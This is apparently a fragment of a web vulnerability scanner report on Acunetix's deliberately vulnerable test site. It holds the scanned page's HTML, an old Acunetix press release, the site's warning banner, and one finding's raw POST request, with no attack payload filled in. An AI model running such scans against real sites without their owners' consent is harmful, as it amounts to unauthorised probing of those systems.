IHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkfCyPhouoc9T07CkSiDvxgplY0cc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKx7LcVAv6Q/OMBAtCnkuUEArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODAwK/k//ECQK/k//ECQK/k5ObAQK/k5ObAQK/k4e+CgK/k4e+CgK/k7vVAwK/k7vVAwK/k6/oDAK/k6/oDAK/k8OMBAK/k8OMBAK/k/ejDQK/k/ejDQK/k+vGBgK/k+vGBgK/k9+vAwK/k9+vAwK/k/PCDAK/k/PCDAKQut3rDwKQut3rDwKQuvGOBwKQuvGOBwKQuuUlApC65SUCkLqZ+AkCkLqZ+AkCkLqNnwECkLqNnwECkLqhsgoCkLqhsgoCkLrV1gMCkLrV1gMCkLrJ7QwCkLrJ7QwCkLq91QkCkLq91QkCkLrR6QICkLrR6QIC19mQngcC19mQngcC19mENQLX2YQ1AtfZuMgJAtfZuMgJAtfZrO8CAtfZrO8CAtfZwIMKAtfZwIMKAtfZ9KYDAtfZ9KYDAtfZ6P0MAtfZ6P0MAtfZnJAEAtfZnJAEZPSnvrIdg8X/qqjYsEEZ5ETd0S8=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3
Method	POST
Parameter
Attack
Evidence	<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=3" id="Form1">
Show / hide Request and Response
Request Header - size: 463 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3 Content-Length: 3721 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 3,721 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8%2BaGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BQWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A%2BICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLEirm5BAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGR35lZNwQ8OqxiqiZO%2F